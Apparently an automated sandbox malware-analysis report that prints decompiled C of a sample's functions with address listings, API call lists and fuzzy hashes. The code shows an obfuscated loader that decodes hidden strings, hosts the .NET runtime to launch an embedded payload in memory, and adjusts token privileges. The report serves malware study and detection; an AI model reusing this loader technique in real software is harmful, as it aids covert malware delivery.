				_t171 = SizeofResource(_t319, _a64);
				_t15 = _t307 + 4; // 0x4
				E0040AC10(_t312,  &_a120, _t15, _t171);
				E0040B9F0(_t307, _t307, 0, _a48);
				_t20 = _t312 + 0xe; // 0xe
				_t320 = _t20;
				_a4 = 0xce;
				_a5 = 0x27;
				_a6 = 0x9c;
				_a7 = 0x1a;
				_a8 = 0x95;
				_a9 = 0x21;
				_a10 = 0x2e;
				_a11 = 0xd;
				_a12 = 0xdb;
				_a13 = 0x29;
				_a14 = 0x57;
				_a15 = 0x56;
				_a16 = 0xf8;
				_a17 = 0x98;
				_a18 = 0x5b;
				_a19 = 0xf4;
				_a20 = 0xb5;
				_a21 = 0x87;
				_a22 = 0x7b;
				_a23 = 0xf;
				_a24 = 0xf4;
				_a25 = 0x76;
				_a26 = 0xb9;
				_a27 = 0x34;
				_a28 = 0xbf;
				_a29 = 0x1e;
				_a30 = 0xe7;
				_a31 = 0x78;
				_a32 = 0x98;
				_a33 = 0xe9;
				_a34 = 0x6f;
				_a35 = 0xb4;
				_a36 = 0;
				_t177 = LoadLibraryA(E00401650( &_a4,  &_a252));
				_a4 = 0xe0;
				_a5 = 0x18;
				_a6 = 0xad;
				_a7 = 0x36;
				_a8 = 0x95;
				_a9 = 0x21;
				_a10 = 0x2a;
				_a11 = 0x57;
				_a12 = 0xda;
				_a13 = 0xc;
				_a14 = 0x55;
				_a15 = 0x25;
				_a16 = 0x8c;
				_a17 = 0xf9;
				_a18 = 0x35;
				_a19 = 0x97;
				_a20 = 0xd0;
				_a21 = 0x87;
				_a22 = 0x7b;
				_a23 = 0xf;
				_a24 = 0xf4;
				_a25 = 0x76;
				_a26 = 0xb9;
				_a27 = 0x34;
				_a28 = 0xbf;
				_a29 = 0x1e;
				_a30 = 0xe7;
				_a31 = 0x78;
				_a32 = 0x98;
				_a33 = 0xe9;
				_a34 = 0x6f;
				_a35 = 0xb4;
				_a36 = 0;
				_t178 = E00401650( &_a4,  &_a220);
				_t331 = _t327 + 0x3c;
				 *0x423480 = GetProcAddress(_t177, _t178);
				_t309 = 0;
				_a112 = 0;
				_a56 = 0;
				_a52 = 0;
				_a43 = 0;
				_a348 =  &_a352;
				_t181 = E004018D0( &_a352,  &_a348,  &_a4, _t312, 3);
				_push( &_a104);
				_push(0x41b230);
				_push(0x41b220);
				_push(0);
				_push(L"wks");
				_push(L"v2.0.50727"); // executed
				L0040AD3E(); // executed
				if(_t181 < 0) {
					_t309 = 0;
					__eflags = 0;
					goto L16;
				} else {
					_t231 = _a88;
					_t233 =  *((intOrPtr*)( *((intOrPtr*)( *_t231 + 0x28))))(_t231); // executed
					if(_t233 < 0) {
						L16:
						_a19 = 1;
						L17:
						_t182 = _a324;
						_t345 = _t182 -  &_a328;
						if(_t182 !=  &_a328) {
							_push(_t182);
							E0040B675(_t249, _t309, _t312, _t345);
							_t331 = _t331 + 4;
						}
						if(_a19 == 0) {
							_a20 = _t309;
							E00401870( &_a36, _t320, "_._");
							_t314 = __imp__#8;
							_a20 = _t309;
							 *_t314( &_a96);
							E00401870( &_a84, _t320, "___");
							_t192 =  *_t314( &_a104);
							_t251 = _t249 + 0xfffffff2;
							_a28 = _t249 + 0xfffffff2;
							_a32 = _t309;
							__imp__#15(0x11, 1,  &_a28); // executed
							_t315 = _t192;
							_a12 = _t309;
							__imp__#23(_t315,  &_a12);
							E0040B310(_t249 + 0xfffffff2, _t309, _t315, _a4, _t320, _t251);
							_t333 = _t331 + 0xc;
							__imp__#24(_t315);
							_t195 = _v12;
							if(_t195 == _t309) {
								_t195 = E0040AD50(0x80004003);
							}
							_t252 = _t195;
							_t196 = _v12;
							if(_t196 != _t309) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 8))))(_t196);
							}
							_v12 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)( *_t252 + 0xb4))))(_t252, _t315,  &_v12); // executed
							if(_t315 != _t309) {
								__imp__#16(_t315);
							}
							_t316 = _v24;
							if(_t316 == _t309) {
								E0040AD50(0x80004003);
							}
							_t199 = _v20;
							if(_t199 != _t309) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t199 + 8))))(_t199);
							}
							_t200 = _v8;
							_v20 = _t309;
							if(_t200 == _t309) {
								_t201 = 0;
								__eflags = 0;
							} else {
								_t201 =  *_t200;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_t316 + 0x44))))(_t316, _t201,  &_v20); // executed
							__imp__#411(0xc, _t309, _t309);
							_t273 = _v44;
							if(_t273 == _t309) {
								E0040AD50(0x80004003);
							}
							_t317 = _a24;
							if(_t317 == _t309) {
								_t296 = 0;
								__eflags = 0;
							} else {
								_t296 =  *_t317;
							}
							_t331 = _t333 - 0x10;
							_t205 = _t331;
							 *_t205 = _a32;
							 *((intOrPtr*)(_t205 + 4)) = _a36;
							 *((intOrPtr*)(_t205 + 8)) = _a40;
							 *((intOrPtr*)(_t205 + 0xc)) = _a44;
							 *((intOrPtr*)( *((intOrPtr*)( *_t273 + 0xe4))))(_t273, _t296, 0x118, _t309, _t309,  &_a48);
							_t254 = __imp__#9; // 0x76e3cf00
							 *_t254( &_a8);
							if(_t317 != _t309 && InterlockedDecrement(_t317 + 8) == 0) {
								_t222 =  *_t317;
								if(_t222 != _t309) {
									__imp__#6(_t222);
								}
								_t223 =  *((intOrPtr*)(_t317 + 4));
								_t358 = _t223 - _t309;
								if(_t223 != _t309) {
									_push(_t223);
									E0040AF8B(_t254, _t309, _t317, _t358);
									_t331 = _t331 + 4;
								}
								E0040AE80(_t254, _t309, _t317, _t358, _t317);
								_t331 = _t331 + 4;
							}
							 *_t254( &_v12);
							_t209 = _v92;
							if(_t209 != _t309) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t209 + 8))))(_t209);
							}
							_t318 = _v80;
							if(_t318 != _t309 && InterlockedDecrement(_t318 + 8) == 0) {
								_t214 =  *_t318;
								if(_t214 != _t309) {
									__imp__#6(_t214);
								}
								_t215 =  *((intOrPtr*)(_t318 + 4));
								_t363 = _t215 - _t309;
								if(_t215 != _t309) {
									_push(_t215);
									E0040AF8B(_t254, _t309, _t318, _t363);
									_t331 = _t331 + 4;
								}
								E0040AE80(_t254, _t309, _t318, _t363, _t318);
								_t331 = _t331 + 4;
							}
							_t210 = _v96;
							if(_t210 != _t309) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t210 + 8))))(_t210);
							}
						}
						_t183 = _a28;
						if(_t183 != _t309) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t183 + 8))))(_t183);
						}
						_t184 = _a32;
						if(_t184 != _t309) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 8))))(_t184);
						}
						return 0;
					}
					_t234 = _a28;
					if(_t234 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 8))))(_t234);
					}
					_t235 = _a84;
					_a28 = _t309;
					 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x34))))(_t235,  &_a28); // executed
					_t312 = _a20;
					if(_t312 == _t309) {
						E0040AD50(0x80004003);
					}
					_t238 = _a16;
					if(_t238 != _t309) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t238 + 8))))(_t238);
					}
					_a16 = _t309;
					 *((intOrPtr*)( *((intOrPtr*)( *_t312))))(_t312, 0x41b270,  &_a16);
					goto L17;
				}
			}






























































                                                                                                            0x00401eb6
                                                                                                            0x00401eb6
                                                                                                            0x00401ec0
                                                                                                            0x00401ec0
                                                                                                            0x00401ecd
                                                                                                            0x00401ed2
                                                                                                            0x00401ed7
                                                                                                            0x00401ed8
                                                                                                            0x00401edd
                                                                                                            0x00401ee5
                                                                                                            0x00401ee5
                                                                                                            0x00401ee5
                                                                                                            0x00401ef0
                                                                                                            0x00401ef6
                                                                                                            0x00401eff
                                                                                                            0x00401eff
                                                                                                            0x00401f02
                                                                                                            0x00401f08
                                                                                                            0x00401f0a
                                                                                                            0x00401f0d
                                                                                                            0x00401f0e
                                                                                                            0x00401f15
                                                                                                            0x00401f16
                                                                                                            0x00401f16
                                                                                                            0x00401f23
                                                                                                            0x00401f2c
                                                                                                            0x00401f32
                                                                                                            0x00401f35
                                                                                                            0x00401f3c
                                                                                                            0x00401f4a
                                                                                                            0x00401f4c
                                                                                                            0x00401f53
                                                                                                            0x00401f60
                                                                                                            0x00401f6d
                                                                                                            0x00401f7f
                                                                                                            0x00401f7f
                                                                                                            0x00401f82
                                                                                                            0x00401f87
                                                                                                            0x00401f8c
                                                                                                            0x00401f91
                                                                                                            0x00401f96
                                                                                                            0x00401f9b
                                                                                                            0x00401fa0
                                                                                                            0x00401fa5
                                                                                                            0x00401faa
                                                                                                            0x00401faf
                                                                                                            0x00401fb4
                                                                                                            0x00401fb9
                                                                                                            0x00401fbe
                                                                                                            0x00401fc3
                                                                                                            0x00401fc8
                                                                                                            0x00401fcd
                                                                                                            0x00401fd2
                                                                                                            0x00401fd7
                                                                                                            0x00401fdc
                                                                                                            0x00401fe1
                                                                                                            0x00401fe6
                                                                                                            0x00401feb
                                                                                                            0x00401ff0
                                                                                                            0x00401ff5
                                                                                                            0x00401ffa
                                                                                                            0x00401fff
                                                                                                            0x00402004
                                                                                                            0x00402009
                                                                                                            0x0040200e
                                                                                                            0x00402013
                                                                                                            0x00402018
                                                                                                            0x0040201d
                                                                                                            0x00402022
                                                                                                            0x00402030
                                                                                                            0x00402038
                                                                                                            0x0040203d
                                                                                                            0x00402042
                                                                                                            0x00402047
                                                                                                            0x0040204c
                                                                                                            0x00402051
                                                                                                            0x00402056
                                                                                                            0x0040205b
                                                                                                            0x0040206d
                                                                                                            0x00402072
                                                                                                            0x00402077
                                                                                                            0x0040207c
                                                                                                            0x00402081
                                                                                                            0x00402086
                                                                                                            0x0040208b
                                                                                                            0x00402090
                                                                                                            0x00402095
                                                                                                            0x0040209a
                                                                                                            0x0040209f
                                                                                                            0x004020a4
                                                                                                            0x004020a9
                                                                                                            0x004020ae
                                                                                                            0x004020b3
                                                                                                            0x004020b8
                                                                                                            0x004020bd
                                                                                                            0x004020c2
                                                                                                            0x004020c7
                                                                                                            0x004020cc
                                                                                                            0x004020d1
                                                                                                            0x004020d6
                                                                                                            0x004020db
                                                                                                            0x004020e0
                                                                                                            0x004020e5
                                                                                                            0x004020ea
                                                                                                            0x004020ef
                                                                                                            0x004020fa
                                                                                                            0x004020ff
                                                                                                            0x00402112
                                                                                                            0x00402119
                                                                                                            0x0040211d
                                                                                                            0x00402121
                                                                                                            0x00402126
                                                                                                            0x0040212d
                                                                                                            0x00402136
                                                                                                            0x00402137
                                                                                                            0x0040213c
                                                                                                            0x00402141
                                                                                                            0x00402142
                                                                                                            0x00402147
                                                                                                            0x0040214c
                                                                                                            0x00402153
                                                                                                            0x004021c3
                                                                                                            0x004021c3
                                                                                                            0x00000000
                                                                                                            0x00402155
                                                                                                            0x00402155
                                                                                                            0x0040215f
                                                                                                            0x00402163
                                                                                                            0x004021c5
                                                                                                            0x004021c5
                                                                                                            0x004021ca
                                                                                                            0x004021ca
                                                                                                            0x004021d8
                                                                                                            0x004021da
                                                                                                            0x004021dc
                                                                                                            0x004021dd
                                                                                                            0x004021e2
                                                                                                            0x004021e2
                                                                                                            0x004021ea
                                                                                                            0x004021f9
                                                                                                            0x004021fd
                                                                                                            0x00402202
                                                                                                            0x00402210
                                                                                                            0x00402214
                                                                                                            0x00402222
                                                                                                            0x0040222f
                                                                                                            0x00402238
                                                                                                            0x0040223d
                                                                                                            0x00402241
                                                                                                            0x00402245
                                                                                                            0x0040224f
                                                                                                            0x00402253
                                                                                                            0x00402257
                                                                                                            0x00402264
                                                                                                            0x00402269
                                                                                                            0x0040226d
                                                                                                            0x00402273
                                                                                                            0x00402279
                                                                                                            0x00402280
                                                                                                            0x00402280
                                                                                                            0x00402285
                                                                                                            0x00402287
                                                                                                            0x0040228d
                                                                                                            0x00402295
                                                                                                            0x00402295
                                                                                                            0x0040229c
                                                                                                            0x004022aa
                                                                                                            0x004022ae
                                                                                                            0x004022b1
                                                                                                            0x004022b1
                                                                                                            0x004022b7
                                                                                                            0x004022bd
                                                                                                            0x004022c4
                                                                                                            0x004022c4
                                                                                                            0x004022c9
                                                                                                            0x004022cf
                                                                                                            0x004022d7
                                                                                                            0x004022d7
                                                                                                            0x004022d9
                                                                                                            0x004022dd
                                                                                                            0x004022e3
                                                                                                            0x004022e9
                                                                                                            0x004022e9
                                                                                                            0x004022e5
                                                                                                            0x004022e5
                                                                                                            0x004022e5
                                                                                                            0x004022f7
                                                                                                            0x004022fd
                                                                                                            0x00402303
                                                                                                            0x00402309
                                                                                                            0x00402310
                                                                                                            0x00402310
                                                                                                            0x00402315
                                                                                                            0x0040231e
                                                                                                            0x00402324
                                                                                                            0x00402324
                                                                                                            0x00402320
                                                                                                            0x00402320
                                                                                                            0x00402320
                                                                                                            0x00402338
                                                                                                            0x0040233b
                                                                                                            0x0040233d
                                                                                                            0x00402347
                                                                                                            0x00402356
                                                                                                            0x00402368
                                                                                                            0x0040236b
                                                                                                            0x0040236d
                                                                                                            0x0040237b
                                                                                                            0x00402385
                                                                                                            0x00402391
                                                                                                            0x00402395
                                                                                                            0x00402398
                                                                                                            0x00402398
                                                                                                            0x0040239e
                                                                                                            0x004023a1
                                                                                                            0x004023a3
                                                                                                            0x004023a5
                                                                                                            0x004023a6
                                                                                                            0x004023ab
                                                                                                            0x004023ab
                                                                                                            0x004023af
                                                                                                            0x004023b4
                                                                                                            0x004023b4
                                                                                                            0x004023bf
                                                                                                            0x004023c1
                                                                                                            0x004023c7
                                                                                                            0x004023cf
                                                                                                            0x004023cf
                                                                                                            0x004023d1
                                                                                                            0x004023d7
                                                                                                            0x004023e3
                                                                                                            0x004023e7
                                                                                                            0x004023ea
                                                                                                            0x004023ea
                                                                                                            0x004023f0
                                                                                                            0x004023f3
                                                                                                            0x004023f5
                                                                                                            0x004023f7
                                                                                                            0x004023f8
                                                                                                            0x004023fd
                                                                                                            0x004023fd
                                                                                                            0x00402401
                                                                                                            0x00402406
                                                                                                            0x00402406
                                                                                                            0x00402409
                                                                                                            0x0040240f
                                                                                                            0x00402417
                                                                                                            0x00402417
                                                                                                            0x0040240f
                                                                                                            0x00402419
                                                                                                            0x0040241f
                                                                                                            0x00402427
                                                                                                            0x00402427
                                                                                                            0x00402429
                                                                                                            0x0040242f
                                                                                                            0x00402437
                                                                                                            0x00402437
                                                                                                            0x00402445
                                                                                                            0x00402445
                                                                                                            0x00402165
                                                                                                            0x0040216b
                                                                                                            0x00402173
                                                                                                            0x00402173
                                                                                                            0x00402175
                                                                                                            0x0040217d
                                                                                                            0x00402188
                                                                                                            0x0040218a
                                                                                                            0x00402190
                                                                                                            0x00402197
                                                                                                            0x00402197
                                                                                                            0x0040219c
                                                                                                            0x004021a2
                                                                                                            0x004021aa
                                                                                                            0x004021aa
                                                                                                            0x004021b1
                                                                                                            0x004021bf
                                                                                                            0x00000000
                                                                                                            0x004021bf

                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00401F23
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 00401F2C
                                                                                                            • _malloc.LIBCMT ref: 00401F3C
                                                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 00401F4C
                                                                                                            • _memset.LIBCMT ref: 00401F6D
                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,00000004,00000000), ref: 00402030
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004020F4
                                                                                                            • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,0041B220,0041B230,?), ref: 0040214C
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00402214
                                                                                                            • VariantInit.OLEAUT32(?), ref: 0040222F
                                                                                                            • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00402245
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00402257
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040226D
                                                                                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 004022B1
                                                                                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000000), ref: 004022FD
                                                                                                            • VariantClear.OLEAUT32(?,00000000,00000118,00000000,?,?,00000000,?,?,00000000,00000003), ref: 0040236B
                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040237B
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 0040238B
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402398
                                                                                                            • VariantClear.OLEAUT32(?), ref: 004023BF
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004023DD
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004023EA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafeVariant$ClearFree$CreateDataDecrementInitInterlockedResourceString_memset$AccessAddressBindDestroyLibraryLoadProcRuntimeSizeofUnaccessVector_malloc
                                                                                                            • String ID: !$!$%$'$)$*$.$4$4$5$6$U$V$W$W$[$_._$___$o$o$v$v$v2.0.50727$wks$x$x${${
                                                                                                            • API String ID: 4264092172-2951066977
                                                                                                            • Opcode ID: 07993b36b8f4d6ac37a0bc8ebc82fa638a88ef5b1ff3f567869e0cdcc056af4e
                                                                                                            • Instruction ID: 69e172c51e94bc9910b865bcfc731b54dfdcc32c1388aee113f6f9db1539967c
                                                                                                            • Opcode Fuzzy Hash: 07993b36b8f4d6ac37a0bc8ebc82fa638a88ef5b1ff3f567869e0cdcc056af4e
                                                                                                            • Instruction Fuzzy Hash: 3C028B701083809EC321DB68C888A5FBBE5AFD6304F444A5DF5D99B2E2D779D805CB6B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA9A3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020DAA23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AdjustPrivilegesToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 2874748243-0
                                                                                                            • Opcode ID: 5c799aa4883f1d87d4edbaf4adcc8cf284b184148ce4dfb27cbcf9311cbe5c38
                                                                                                            • Instruction ID: f0be4f1f883e1739bf488548fabfe6c58ab49c701007ebf5f9df92cca0e9a752
                                                                                                            • Opcode Fuzzy Hash: 5c799aa4883f1d87d4edbaf4adcc8cf284b184148ce4dfb27cbcf9311cbe5c38
                                                                                                            • Instruction Fuzzy Hash: 8321BF7650A7809FDB238F25DC40B52BFF4EF06210F09859AE9858F563D3709908DB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB97F, Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020DB9F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InformationQuerySystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562636166-0
                                                                                                            • Opcode ID: b3e5d5455794b11e70cd0077c3987ae61a12c68363cd91a8ef35c360ffc30db9
                                                                                                            • Instruction ID: c751f83f0b85f0a70e2c51ce4b9f42600df8a8bf62c3f1b9fdbc4fbf6a8bbbdf
                                                                                                            • Opcode Fuzzy Hash: b3e5d5455794b11e70cd0077c3987ae61a12c68363cd91a8ef35c360ffc30db9
                                                                                                            • Instruction Fuzzy Hash: 5B219A7200E3C09FDB238B25DC50A52FFB0EF07224F0984DAE9C48F563D265A948DB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA9DA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020DAA23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AdjustPrivilegesToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 2874748243-0
                                                                                                            • Opcode ID: a5f47f6a41143c3251978b58f80e7bfa018c1198cb40abeca1ffa6d3e9a8225d
                                                                                                            • Instruction ID: c13b4b33dd05a24f3af657aa2a8538fb1b04a2447a7c985c92d342a3ca5bce0b
                                                                                                            • Opcode Fuzzy Hash: a5f47f6a41143c3251978b58f80e7bfa018c1198cb40abeca1ffa6d3e9a8225d
                                                                                                            • Instruction Fuzzy Hash: 0511A0726013009FDB61CF59D944B56FBE4EF04220F08856AED458B656D335E408DF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DBD8A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,00000E38,?,?), ref: 020DBDDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: 5ca873733048ad0937a4d590d732b6e12baa7e6e872b277d7e1286230cc732fc
                                                                                                            • Instruction ID: 4b1b13c87d09795d90dbe60a6d0d4124e4b05fe6dc7f9d2ad73c9edf130fd2c9
                                                                                                            • Opcode Fuzzy Hash: 5ca873733048ad0937a4d590d732b6e12baa7e6e872b277d7e1286230cc732fc
                                                                                                            • Instruction Fuzzy Hash: 0701A271500601ABD214DF1ADC86B32FBA4FB89B20F14815AED084B741D631F516CAE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB9BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020DB9F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InformationQuerySystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562636166-0
                                                                                                            • Opcode ID: 1f5a3c035f8c6c98127073f9bed61dcfa928a5b6ea3a0d184325ebe70c253b50
                                                                                                            • Instruction ID: 1882afa58792374e58818decdb4f2d918069a250169dd4f83a5bb52bf7c65edd
                                                                                                            • Opcode Fuzzy Hash: 1f5a3c035f8c6c98127073f9bed61dcfa928a5b6ea3a0d184325ebe70c253b50
                                                                                                            • Instruction Fuzzy Hash: 48018B315013409FDB618F4AD984B25FFA0EF08724F08C49AED494B616D375E418DB72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004018D0, Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E004018D0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}











                                                                                                            0x004018d0
                                                                                                            0x004018d2
                                                                                                            0x004018d6
                                                                                                            0x004018da
                                                                                                            0x004018f7
                                                                                                            0x004018fa
                                                                                                            0x0040190f
                                                                                                            0x00401919
                                                                                                            0x0040191b
                                                                                                            0x0040191e
                                                                                                            0x00401920
                                                                                                            0x00401929
                                                                                                            0x0040193e
                                                                                                            0x0040194b
                                                                                                            0x00401960
                                                                                                            0x0040196a
                                                                                                            0x0040196c
                                                                                                            0x0040196c
                                                                                                            0x0040196f
                                                                                                            0x00401971
                                                                                                            0x00401971
                                                                                                            0x0040196f
                                                                                                            0x0040197a
                                                                                                            0x004018dc
                                                                                                            0x004018dc
                                                                                                            0x004018e0
                                                                                                            0x004018e0

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 004018E6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040190F
                                                                                                            • GetLastError.KERNEL32 ref: 00401920
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401938
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401960
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3322701435-0
                                                                                                            • Opcode ID: 8573e2c317d3cfbbe08dd234adf7fb2bf028b8f5a35bd758f9ba00c18020373e
                                                                                                            • Instruction ID: 479df52544d56d876bc77731e3856ebb8807a2cfa2341b2feafe69ca537890df
                                                                                                            • Opcode Fuzzy Hash: 8573e2c317d3cfbbe08dd234adf7fb2bf028b8f5a35bd758f9ba00c18020373e
                                                                                                            • Instruction Fuzzy Hash: 4C11B2766402247BD230A7558C88F677F6CEF86BA9F008169FD85AB291C635AC04C6B8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040AF26, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E0040AF26(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B80D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2A3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEBC(0x423484);
							E0040D27D( *0x423490, 0x41a6c4);
						}
						E0040AF09( &_v16, 0x423484);
						E0040CCF9( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E198(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6A0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D6D3(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D703();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B6CB();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BF81(__eflags);
										 *_t21 = E0040BF3F(GetLastError());
									}
								}
							}
						}
						return E0040E1DD(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

















                                                                                                            0x0040af26
                                                                                                            0x0040af26
                                                                                                            0x0040af29
                                                                                                            0x0040af3d
                                                                                                            0x0040af40
                                                                                                            0x0040af48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040af33
                                                                                                            0x0040af39
                                                                                                            0x0040af3b
                                                                                                            0x0040af4c
                                                                                                            0x0040af58
                                                                                                            0x0040af5a
                                                                                                            0x0040af5a
                                                                                                            0x0040af63
                                                                                                            0x0040af6d
                                                                                                            0x0040af72
                                                                                                            0x0040af77
